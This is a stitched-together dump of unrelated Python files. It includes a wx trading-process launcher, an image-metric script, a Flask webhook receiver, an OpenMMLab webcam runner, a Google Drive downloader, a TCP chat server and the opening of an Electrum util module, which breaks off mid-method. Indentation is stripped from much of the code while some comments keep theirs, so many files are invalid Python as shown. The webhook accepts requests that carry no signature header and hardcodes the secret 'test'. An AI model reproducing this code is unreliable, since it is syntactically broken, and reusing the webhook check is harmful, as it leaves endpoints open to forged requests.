t = sub_process(final_command)
self.quote_process[key] = t
final_command = '%s --mini "%s" --cini "%s" --commodity %s' % (QUOTE_WRITER_EXE, self.market_ini, self.commodity_ini, ccode)
self.loginfo(final_command)
w = sub_process(final_command)
self.quote_workers[key] = w
#--------------------------------------------------
#--------------------------------------------------
                    # check whether each strategy should be running
for sk, sv in self.s_obj.items():
                        # we store True/False as strings; TODO: s_obj is not
                        # updated after saving, and updates should be locked
                        # while a trader is running. ???
if sv['ccode'] == ccode:
                            if sv['run'] in (True, u'True'):  # stored as a string by ConfigObj
# prepare command
period_code = SUPPORT_TIME[
SUPPORT_TIME_NAME.index(sv['period'])]
hisfile = os.path.join(
com_data_dir, "%s.csv" % (period_code))
quotefile = os.path.join(
com_quote_dir, "%s.ohlc" % (period_code))
#trader.py -his data\SMX\STW\min5.csv -q R:\TEMP\data\SMX\STW\min5.ohlc -f stest.py -g
final_command = r'%s --history "%s" --quote "%s" --file "%s" -g' % (TRADER_EXE, hisfile, quotefile, sv['strategyfile'])
# check exist or dead
if sk not in self.trader:
self.loginfo(final_command)
t = sub_process(final_command)
self.trader[sk] = t
else:
                                    # trader already running; let's poll its health
if self.trader[sk].poll() is not None:
                                        # poll() returns None while still running;
                                        # anything else means it died, so restart it.
self.trader.pop(sk)
self.loginfo(final_command)
t = sub_process(final_command)
self.trader[sk] = t
#--------------------------------------------------
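    # Example: with start='21:00' and end='05:00' the session crosses midnight,
    # so should_running is True at 23:30 or 03:00 market time and False at 12:00.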
def should_running(self, start, end, timezone):
if (start and end and timezone):
now = get_now(timezone)
hh, mm = map(int, start.split(':', 1))
tzstart = get_tz_hhmm(hh, mm, timezone)
hh, mm = map(int, end.split(':', 1))
tzend = get_tz_hhmm(hh, mm, timezone)
            if end < start:
                # trading session crosses midnight
                return now >= tzstart or now <= tzend
            return tzstart <= now <= tzend
return False
def stop_process(self):
        # terminate and wait for child processes
#--------------------------------------------------
for k in self.trader.keys():
try:
self.trader[k].terminate()
except WindowsError:
# if the quote source server already died
# WindowsError: [Error 5] Access Denied
# FIXME
pass
for k in self.quote_process.keys():
try:
self.quote_process[k].terminate()
except WindowsError:
# if the quote source server already died
# WindowsError: [Error 5] Access Denied
# FIXME
pass
for k in self.quote_workers.keys():
try:
self.quote_workers[k].terminate()
except WindowsError:
# if the quote source server already died
# WindowsError: [Error 5] Access Denied
# FIXME
pass
#isalive = 1
#while isalive:
#isalive = 0
#for k in self.quote_process.keys():
#isalive = isalive + self.quote_process[k].is_alive()
#isalive = 1
#while isalive:
#isalive = 0
#for k in self.quote_workers.keys():
#isalive = isalive + self.quote_workers[k].is_alive()
#--------------------------------------------------
#if hasattr(sys, 'frozen'):
## We need to wait for all child processes otherwise
## --onefile mode won't work.
#while multiprocessing.active_children():
#multiprocessing.active_children()[0].terminate()
#time.sleep(3) # wait for kill all, FIXME better way for waitting
def render_all(self):
self.render_market()
self.render_commodity()
self.render_strategy()
def render_market(self):
self.mctrl.DeleteAllItems()
for k, v in self.m_obj.items():
index = self.mctrl.InsertStringItem(sys.maxint, v.get('mname'))
self.mctrl.SetStringItem(index, 1, v.get('mcode'))
self.mctrl.SetStringItem(index, 2, v.get('mtimezone'))
self.mctrl.SetColumnWidth(2, 100)
self.mctrl.SetItemBackgroundColour(index, wx.Color(229, 229, 229))
def render_commodity(self):
self.cctrl.DeleteAllItems()
for k, v in self.c_obj.items():
index = self.cctrl.InsertStringItem(sys.maxint, v.get('cname'))
self.cctrl.SetStringItem(index, 1, v.get('ccode'))
self.cctrl.SetStringItem(index, 2, v.get('mcode'))
self.cctrl.SetStringItem(index, 3, v.get('csource'))
self.cctrl.SetStringItem(index, 4, v.get('cdir'))
self.cctrl.SetItemBackgroundColour(index, wx.Color(229, 229, 229))
def render_strategy(self):
self.sctrl.DeleteAllItems()
for k, v in self.s_obj.items():
index = self.sctrl.InsertStringItem(sys.maxint, k)
self.sctrl.SetStringItem(index, 1, v.get('ccode'))
self.sctrl.SetStringItem(index, 2, v.get('strategyfile'))
self.sctrl.SetStringItem(index, 3, v.get('period'))
self.sctrl.SetItemBackgroundColour(index, wx.Color(229, 229, 229))
if v.get('run') == u"True":
self.sctrl.CheckItem(index)
def load_market(self):
self.m_obj = ConfigObj(self.market_ini, encoding='utf-8')
def load_commodity(self):
self.c_obj = ConfigObj(self.commodity_ini, encoding='utf-8')
def load_strategy(self):
self.s_obj = ConfigObj(self.strategy_ini, encoding='utf-8')
def loaddata(self):
self.load_market()
self.load_commodity()
self.load_strategy()
def loginfo(self, text=u""):
if text:
self.log.AppendText(datetime.datetime.now(
).strftime("%m-%d %H:%M:%S") + u" " + text + u"\n")
self.logger.info(text)
if __name__ == '__main__':
if sys.platform.startswith('win'):
        multiprocessing.freeze_support()  # multiprocessing workaround on Windows
app = wx.PySimpleApp(False)
#---------------------------------------------
# locale
#basepath = os.path.abspath(os.path.dirname(sys.argv[0]))
#localedir = os.path.join(basepath, "locale")
langid = wx.LANGUAGE_DEFAULT
mylocale = wx.Locale(langid)
mylocale.AddCatalogLookupPathPrefix('./locale')
mylocale.AddCatalog('messages')
_ = wx.GetTranslation
# override
import __builtin__
__builtin__._ = wx.GetTranslation
# override wxobject
import wxobject
wxobject._ = wx.GetTranslation
#---------------------------------------------
frm = FF(None)
frm.Show()
    # DEBUG: uncomment the following two lines to enable the inspection tool
#import wx.lib.inspection
#wx.lib.inspection.InspectionTool().Show()
app.MainLoop()
|
cal_connectivity.py
|
from dk_metric import image_metrics
import os
from multiprocessing import Process, Lock, Manager
import numpy as np
import time
import sys
gt_folder = sys.argv[1]
prop_folder = sys.argv[2]
lock = Lock()
Thread_Cnt = 16
Threshold = 0.4 * 255
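# The proposal files are split across Thread_Cnt worker processes; each worker
# sums per-image connectivity scores and counts into the shared list, and the
# mean score over all scored images is printed at the end.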
def cal_connectivity(files, l, threshold):
# sTP, sFP, sFN, msTP, msFP, msFN
start_time = time.time()
score, n = 0, 0
for i, f in enumerate(files):
gt_path = os.path.join(gt_folder, f)
prop_path = os.path.join(prop_folder, f)
if i != 0 and i % 100 == 0:
print(os.getpid(), i, 'th file... use', time.time() - start_time, 'seconds.')
s = image_metrics.get_connectivity(gt_path, prop_path, threshold=threshold, N=100, Suppress=True)
if s is not None:
            score += s
n += 1
with lock:
l[0] += score
l[1] += n
if __name__ == '__main__':
files = os.listdir(prop_folder)
manager = Manager()
# Score, Image_cnt
ml = manager.list([0, 0])
pool = []
files_threads = np.array_split(files, Thread_Cnt)
for i in range(Thread_Cnt):
pool.append(Process(target=cal_connectivity, args=(files_threads[i].tolist(), ml, Threshold,)))
for t in pool:
t.start()
for t in pool:
t.join()
total_score, n = list(ml)
print(total_score / n)
|
app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author : microfat
# @time : 04/21/22 11:37:59
# @File : app.py
import hashlib
import threading
import json
from pygments import highlight, lexers, formatters
from flask import Flask, request
app = Flask(__name__)
class Handle:
def __init__(self):
pass
def handle(self, payload):
        # All create/update/remove/recover/form events are pretty-printed the
        # same way; data_test is only acknowledged with a plain message.
        if payload['op'] in ('data_create', 'data_update', 'data_remove',
                             'data_recover', 'form_update'):
            print(self._colorful_json(payload))
        if payload['op'] == 'data_test':
            print('data_test')
def _colorful_json(self, payload):
formatted_json = json.dumps(payload, indent=4, ensure_ascii=False, sort_keys=True)
colorful_json = highlight(formatted_json, lexers.JsonLexer(), formatters.TerminalFormatter())
return colorful_json
def get_signature(self, nonce, payload, secret, timestamp):
content = ':'.join([nonce, payload, secret, timestamp]).encode('utf-8')
m = hashlib.sha1()
m.update(content)
#print(content, m.hexdigest())
return m.hexdigest()
@app.route('/', methods=['POST'])
def callback():
handle = Handle()
payload = request.data.decode('utf-8')
#print(payload)
nonce = request.args['nonce']
timestamp = request.args['timestamp']
print('\n' + '\x1b[94m' + str(request.headers) + '\x1b[39;49;00m', end='')
if 'x-jdy-signature' not in request.headers:
threading.Thread(target=handle.handle, args=(json.loads(payload), )).start()
return 'success'
elif request.headers['x-jdy-signature'] != handle.get_signature(nonce, payload, 'test', timestamp):
return 'fail', 401
else:
threading.Thread(target=handle.handle, args=(json.loads(payload), )).start()
return 'success'
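# A hedged sketch of how a client could sign a request so callback() accepts it
# (the 'test' secret is the one checked above; the URL and port are assumptions):
#   payload = json.dumps({'op': 'data_test'})
#   signature = Handle().get_signature(nonce, payload, 'test', timestamp)
#   requests.post('http://localhost:5000/?nonce=%s&timestamp=%s' % (nonce, timestamp),
#                 data=payload, headers={'x-jdy-signature': signature})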
|
webcam_runner.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import logging
import sys
import time
import warnings
from contextlib import nullcontext
from threading import Thread
from typing import Dict, List, Optional, Tuple, Union
import cv2
from .nodes import NODES
from .utils import (BufferManager, EventManager, FrameMessage, ImageCapture,
VideoEndingMessage, is_image_file, limit_max_fps)
DEFAULT_FRAME_BUFFER_SIZE = 1
DEFAULT_INPUT_BUFFER_SIZE = 1
DEFAULT_DISPLAY_BUFFER_SIZE = 0
DEFAULT_USER_BUFFER_SIZE = 1
class WebcamRunner():
"""An interface for building webcam application from config.
Parameters:
name (str): Runner name.
camera_id (int | str): The camera ID (usually the ID of the default
camera is 0). Alternatively a file path or a URL can be given
to load from a video or image file.
camera_frame_shape (tuple, optional): Set the frame shape of the
camera in (width, height). If not given, the default frame shape
will be used. This argument is only valid when using a camera
as the input source. Default: None
camera_fps (int): Video reading maximum FPS. Default: 30
buffer_sizes (dict, optional): A dict to specify buffer sizes. The
key is the buffer name and the value is the buffer size.
Default: None
nodes (list): Node configs.
"""
def __init__(self,
name: str = 'Default Webcam Runner',
camera_id: Union[int, str] = 0,
camera_fps: int = 30,
camera_frame_shape: Optional[Tuple[int, int]] = None,
synchronous: bool = False,
buffer_sizes: Optional[Dict[str, int]] = None,
nodes: Optional[List[Dict]] = None):
# Basic parameters
self.name = name
self.camera_id = camera_id
self.camera_fps = camera_fps
self.camera_frame_shape = camera_frame_shape
self.synchronous = synchronous
# self.buffer_manager manages data flow between runner and nodes
self.buffer_manager = BufferManager()
# self.event_manager manages event-based asynchronous communication
self.event_manager = EventManager()
# self.node_list holds all node instance
self.node_list = []
# self.vcap is used to read camera frames. It will be built when the
# runner starts running
self.vcap = None
# Register runner events
self.event_manager.register_event('_exit_', is_keyboard=False)
if self.synchronous:
self.event_manager.register_event('_idle_', is_keyboard=False)
# Register nodes
if not nodes:
raise ValueError('No node is registered to the runner.')
# Register default buffers
if buffer_sizes is None:
buffer_sizes = {}
# _frame_ buffer
frame_buffer_size = buffer_sizes.get('_frame_',
DEFAULT_FRAME_BUFFER_SIZE)
self.buffer_manager.register_buffer('_frame_', frame_buffer_size)
# _input_ buffer
input_buffer_size = buffer_sizes.get('_input_',
DEFAULT_INPUT_BUFFER_SIZE)
self.buffer_manager.register_buffer('_input_', input_buffer_size)
# _display_ buffer
display_buffer_size = buffer_sizes.get('_display_',
DEFAULT_DISPLAY_BUFFER_SIZE)
self.buffer_manager.register_buffer('_display_', display_buffer_size)
# Build all nodes:
for node_cfg in nodes:
logging.info(f'Create node: {node_cfg.name}({node_cfg.type})')
node = NODES.build(node_cfg)
# Register node
self.node_list.append(node)
# Register buffers
for buffer_info in node.registered_buffers:
buffer_name = buffer_info.buffer_name
if buffer_name in self.buffer_manager:
continue
buffer_size = buffer_sizes.get(buffer_name,
DEFAULT_USER_BUFFER_SIZE)
self.buffer_manager.register_buffer(buffer_name, buffer_size)
logging.info(
f'Register user buffer: {buffer_name}({buffer_size})')
# Register events
for event_info in node.registered_events:
self.event_manager.register_event(
event_name=event_info.event_name,
is_keyboard=event_info.is_keyboard)
logging.info(f'Register event: {event_info.event_name}')
# Set runner for nodes
        # This step is performed after node building, when the runner has
        # created the full buffer/event managers and can be handed to the nodes.
for node in self.node_list:
            logging.info(f'Set runner for node: {node.name}')
node.set_runner(self)
def _read_camera(self):
"""Continually read video frames and put them into buffers."""
camera_id = self.camera_id
fps = self.camera_fps
# Build video capture
if is_image_file(camera_id):
self.vcap = ImageCapture(camera_id)
else:
self.vcap = cv2.VideoCapture(camera_id)
if self.camera_frame_shape is not None:
width, height = self.camera_frame_shape
self.vcap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.vcap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
if not self.vcap.isOpened():
warnings.warn(f'Cannot open camera (ID={camera_id})')
sys.exit()
# Read video frames in a loop
first_frame = True
while not self.event_manager.is_set('_exit_'):
if self.synchronous:
if first_frame:
cm = nullcontext()
else:
# Read a new frame until the last frame has been processed
cm = self.event_manager.wait_and_handle('_idle_')
else:
# Read frames with a maximum FPS
cm = limit_max_fps(fps)
first_frame = False
with cm:
# Read a frame
ret_val, frame = self.vcap.read()
if ret_val:
# Put frame message (for display) into buffer `_frame_`
frame_msg = FrameMessage(frame)
self.buffer_manager.put('_frame_', frame_msg)
# Put input message (for model inference or other use)
# into buffer `_input_`
input_msg = FrameMessage(frame.copy())
input_msg.update_route_info(
node_name='Camera Info',
node_type='dummy',
info=self._get_camera_info())
self.buffer_manager.put_force('_input_', input_msg)
else:
# Put a video ending signal
self.buffer_manager.put('_frame_', VideoEndingMessage())
self.vcap.release()
def _display(self):
"""Continually obtain and display output frames."""
output_msg = None
while not self.event_manager.is_set('_exit_'):
while self.buffer_manager.is_empty('_display_'):
time.sleep(0.001)
# Set _idle_ to allow reading next frame
if self.synchronous:
self.event_manager.set('_idle_')
# acquire output from buffer
output_msg = self.buffer_manager.get('_display_')
            # A VideoEndingMessage indicates the input stream has ended
if isinstance(output_msg, VideoEndingMessage):
self.event_manager.set('_exit_')
break
img = output_msg.get_image()
# show in a window
cv2.imshow(self.name, img)
# handle keyboard input
key = cv2.waitKey(1)
if key != -1:
self._on_keyboard_input(key)
cv2.destroyAllWindows()
def _on_keyboard_input(self, key):
"""Handle the keyboard input."""
if key in (27, ord('q'), ord('Q')):
logging.info(f'Exit event captured: {key}')
self.event_manager.set('_exit_')
else:
logging.info(f'Keyboard event captured: {key}')
self.event_manager.set(key, is_keyboard=True)
def _get_camera_info(self):
"""Return the camera information in a dict."""
frame_width = self.vcap.get(cv2.CAP_PROP_FRAME_WIDTH)
frame_height = self.vcap.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_rate = self.vcap.get(cv2.CAP_PROP_FPS)
cam_info = {
'Camera ID': self.camera_id,
'Source resolution': f'{frame_width}x{frame_height}',
'Source FPS': frame_rate,
}
return cam_info
def run(self):
"""Program entry.
This method starts all nodes as well as video I/O in separate threads.
"""
try:
# Start node threads
non_daemon_nodes = []
for node in self.node_list:
node.start()
if not node.daemon:
non_daemon_nodes.append(node)
# Create a thread to read video frames
t_read = Thread(target=self._read_camera, args=())
t_read.start()
# Run display in the main thread
self._display()
logging.info('Display shut down')
            # join non-daemon nodes and runner threads
logging.info('Camera reading about to join')
t_read.join()
for node in non_daemon_nodes:
logging.info(f'Node {node.name} about to join')
node.join()
except KeyboardInterrupt:
pass
|
zipf_from_dir.py
|
"""ZipfFromDir create a Zipf from a directory with text files."""
from glob import glob
from multiprocessing import Manager, Process, cpu_count, Queue, Value
from multiprocessing.managers import BaseManager
from os import walk
from os.path import join
import queue
import time
from ...factories import ZipfFromFile
from ...zipf import Zipf
from .cli_from_dir import CliFromDir as cli
from .statistic_from_dir import StatisticFromDir
class MyManager(BaseManager):
"""Extend BaseManager to be customizable."""
pass
MyManager.register('StatisticFromDir', StatisticFromDir)
class ZipfFromDir(ZipfFromFile):
"""ZipfFromDir create a Zipf from a directory with text files."""
def __init__(self, options=None, use_cli=False):
"""Create a ZipfFromDir with give options."""
super().__init__(options)
self._opts["sort"] = False
self._use_cli = use_cli
self._myManager = MyManager()
self._myManager.start()
self._processes = None
self._statistic = self._myManager.StatisticFromDir()
self._processes_number = cpu_count()
def _paths_to_zipf(self):
"""Create a Zipf from given paths."""
while not self._kill.value:
try:
paths = self._queue.get(False)
except queue.Empty:
time.sleep(0.1)
continue
self.set_product(Zipf())
use_cli = self._use_cli
self._statistic.set_live_process("text to zipf converter")
n = 50
i = 0
for path in paths:
super().run(path)
i += 1
if i % n == 0 and use_cli:
self._statistic.add_zipf(n)
if use_cli:
self._statistic.add_zipf(i % n)
self._result_queue.put(self.get_product() / len(paths))
self._statistic.set_dead_process("text to zipf converter")
def _validate_base_paths(self, base_paths):
"""Validate paths argument."""
if isinstance(base_paths, str):
return [base_paths]
if isinstance(base_paths, list):
return base_paths
raise ValueError("No paths were given.")
def _setup_extensions(self, extensions):
"""Handle setup of given extensions list."""
if extensions:
self._extensions = extensions
else:
self._extensions = ["*"]
def _load_paths(self, base_paths):
"""Recursively load paths from given base paths."""
n = self._processes_number
files_lists = []
for i in range(n):
files_lists.append([])
i = 0
files_number = 0
for path in self._validate_base_paths(base_paths):
for extension in self._extensions:
for x in walk(path):
for y in glob(join(x[0], '*.%s' % extension)):
files_lists[i].append(y)
files_number += 1
i = (i + 1) % n
if files_number == 0:
return None
self._statistic.set_total_files(files_number)
return [files_list for files_list in files_lists if len(files_list)]
def _render_zipfs(self, chunked_paths):
"""Execute Zipf rendering from paths in multiprocessing."""
single_run = False
if not self.are_processes_active():
single_run = True
self.start_processes()
self._statistic.set_phase("Converting files to zipfs")
n = len(chunked_paths)
[self._queue.put(chk) for chk in chunked_paths]
results = [self._result_queue.get() for i in range(n)]
if single_run:
self.close_processes()
return results
def start_processes(self):
"""Start a group of processes."""
self._statistic.set_phase("Starting processes")
self._kill = Value('i', 0)
self._queue = Queue()
self._result_queue = Queue()
self._processes = [
Process(target=self._paths_to_zipf) for i in range(self._processes_number)
]
[p.start() for p in self._processes]
def close_processes(self):
"""Closes the group of processes."""
self._kill.value=1
[p.join() for p in self._processes]
self._processes = None
def are_processes_active(self):
return self._processes is not None
def run(self, paths, extensions=None):
"""Create and return zipf created from given paths."""
self._setup_extensions(extensions)
self._statistic.reset()
if self._use_cli:
self._cli = cli(self._statistic)
self._cli.run()
self._statistic.set_phase("Loading file paths")
chunked_paths = self._load_paths(paths)
if chunked_paths is None:
self._statistic.done()
if self._use_cli:
self._cli.join()
return Zipf()
zipfs = self._render_zipfs(chunked_paths)
self._statistic.set_phase("Normalizing zipfs")
if len(zipfs) == 0:
self._statistic.done()
if self._use_cli:
self._cli.join()
return Zipf()
normalized_zipf = (sum(zipfs) / len(zipfs)).sort()
self._statistic.done()
if self._use_cli:
self._cli.join()
return normalized_zipf
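# Illustrative usage sketch, not part of the original module. The corpus directory
# and extension below are hypothetical; run() accepts a single path or a list of
# paths plus an optional list of file extensions, and returns a normalized Zipf
# built from all matching files.
if __name__ == '__main__':
    zipf_builder = ZipfFromDir(use_cli=False)
    corpus_zipf = zipf_builder.run("/path/to/corpus", extensions=["txt"])
    print(corpus_zipf)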
|
DownloadManager.py
|
from googleapiclient.discovery import build
from googleapiclient.http import MediaIoBaseDownload
import io
import threading
import csv
import time
class DownloadManager:
def __init__(self, creds):
self.creds = creds
def downloadFile(self, fid, fname):
service = build('drive','v3', credentials=self.creds)
request = service.files().get_media(fileId=fid)
fh = io.FileIO('{}.png'.format(fname),'wb')
downloader = MediaIoBaseDownload(fh, request)
done = False
while done is False:
status, done = downloader.next_chunk()
print("GET: {}".format(fname))
def getList(self):
service = build('drive','v3', credentials=self.creds)
results = service.files().list(
fields="nextPageToken, files(id, name)").execute()
items = results.get('files', [])
itemList = []
if not items:
print('No files found.')
else:
print('Files:')
for item in items:
print(u'{0} ({1})'.format(item['name'], item['id']))
itemList.append({'fname':item['name'], 'fid':item['id']})
i=0
with open("itemList.csv", 'w') as f:
fieldnames=['fname','fid']
fwriter = csv.DictWriter(f,fieldnames=fieldnames)
for item in itemList:
i+=1
fwriter.writerow(item)
print("----------------------------------------------------------")
print("Action Completed! {} rows written to itemList.csv".format(i))
def downloadFromListThread(self, filePath):
itemList = []
with open(filePath,'r') as csvlist:
csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])
for row in csv_reader:
line = {}
line['fid']=row['fid']
line['fname']=row['fname']
itemList.append(line)
threads = []
for item in itemList:
thread = threading.Thread(target=self.downloadFile, args=(item['fid'],item['fname'],))
threads.append(thread)
t1 = time.perf_counter()
i=0
for thread in threads:
thread.start()
print("HIT: {}".format(itemList[i]['fname']))
i+=1
i=0
for thread in threads:
thread.join()
i+=1
t2 = time.perf_counter()
print("----------------------------------------------------------")
print("Action Completed! {} Files downloaded, {}m {}s Elapsed ".format(i, int((t2-t1)/60), int(t2-t1)%60))
def downloadFromListRegular(self, filePath):
with open(filePath,'r') as csvlist:
csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])
t1 = time.perf_counter()
i = 0
for row in csv_reader:
print("HIT: {}".format(row['fname']))
self.downloadFile(row['fid'],row['fname'])
i+=1
t2 = time.perf_counter()
print("----------------------------------------------------------")
print("Action Completed! {} Files downloaded, {}m {}s Elapsed ".format(i, int((t2-t1)/60), int(t2-t1)%60))
|
demo4.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Topic: Inter-process communication
Desc : Processes inevitably need to communicate with each other, and the operating system provides many mechanisms for this.
Python's multiprocessing module wraps the underlying mechanisms and provides Queue, Pipes and other ways to exchange data.
Using Queue as an example, the parent process creates two child processes: one writes data into the Queue and the other reads data from it.
"""
from multiprocessing import Process, Queue
import os, time, random
# Code executed by the writer process:
def write(q):
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# Code executed by the reader process:
def read(q):
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__ == '__main__':
    # The parent process creates the Queue and passes it to each child process:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
    # Start child process pw (writer):
pw.start()
    # Start child process pr (reader):
pr.start()
    # Wait for pw to finish:
pw.join()
    # pr runs an infinite loop and will never finish on its own, so it has to be terminated forcibly:
pr.terminate()
|
__main__.py
|
import voicemeeter
from ctypes import cast, POINTER
from comtypes import CLSCTX_ALL
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume
import time
from PIL import Image
import pystray
import threading
import pkgutil
kind = 'banana'
voicemeeter.launch(kind)
devices = AudioUtilities.GetSpeakers()
interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
volume = cast(interface, POINTER(IAudioEndpointVolume))
VOLUME_DB_SHIFT = -15
def control_voicemeeter_volume():
with voicemeeter.remote(kind) as vmr:
while True:
time.sleep(0.1) # in seconds
new_volume = volume.GetMasterVolumeLevel() + VOLUME_DB_SHIFT
vmr.outputs[0].gain = new_volume # Output A1
vmr.outputs[2].gain = new_volume # Output A3
def exit_app():
icon.stop()
TRAY_TOOLTIP = 'Voicemeeter Volume Control'
TRAY_ICON = 'tray_icon.png'
icon = pystray.Icon(TRAY_TOOLTIP, Image.open(TRAY_ICON), menu=pystray.Menu(
pystray.MenuItem('Exit ' + TRAY_TOOLTIP, exit_app)
))
control_thread = threading.Thread(target=control_voicemeeter_volume, daemon=True)
if __name__ == '__main__':
control_thread.start()
icon.run()
|
TCPserver.py
|
from socket import *
from threading import Thread
while True:
PORT = input("请指定服务器端口\n>>>")
try:
PORT = int(PORT)
except:
print("请输入纯数字的端口号")
else:
break
print("正在等待客户端连接......")
def recv():
while True:
        recv_data = newSocket.recv(1024)
        print('Client:', recv_data.decode('gbk'))
def send_msg():
while True:
msg = input('>>>')
newSocket.send(msg.encode('gbk'))
# Create the TCP socket
tcpSerSocket = socket(AF_INET, SOCK_STREAM)
# Bind the local address information
address = ('', PORT)
tcpSerSocket.bind(address)
tcpSerSocket.listen(128)
newSocket, clientAddr = tcpSerSocket.accept()
thread_rece = Thread(target=recv)
thread_send = Thread(target=send_msg)
thread_rece.start()
thread_send.start()
thread_rece.join()
thread_send.join()
# Close the socket serving this client. Once it is closed, this client can no longer be served; to be served again it has to reconnect.
newSocket.close()
# Close the listening socket. Once it is closed, the program can no longer accept any new client connections.
tcpSerSocket.close()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple, Union
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
import asyncio
import urllib.request, urllib.parse, urllib.error
import builtins
import json
import time
import aiohttp
from aiohttp_socks import SocksConnector, SocksVer
from aiorpcx import TaskGroup
from .i18n import _
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTCC':8, 'mBTCC':5, 'uBTCC':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['BTCC', 'mBTCC', 'uBTCC', 'sat'] # list(dict) does not guarantee order
DECIMAL_POINT_DEFAULT = 8 # BTCC
class UnknownBaseUnit(Exception): pass
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise UnknownBaseUnit(dp) from None
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise UnknownBaseUnit(unit_name) from None
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Raise this exception to unwind the stack, as when an error occurs;
# unlike other exceptions, however, the user will not be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTCC"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
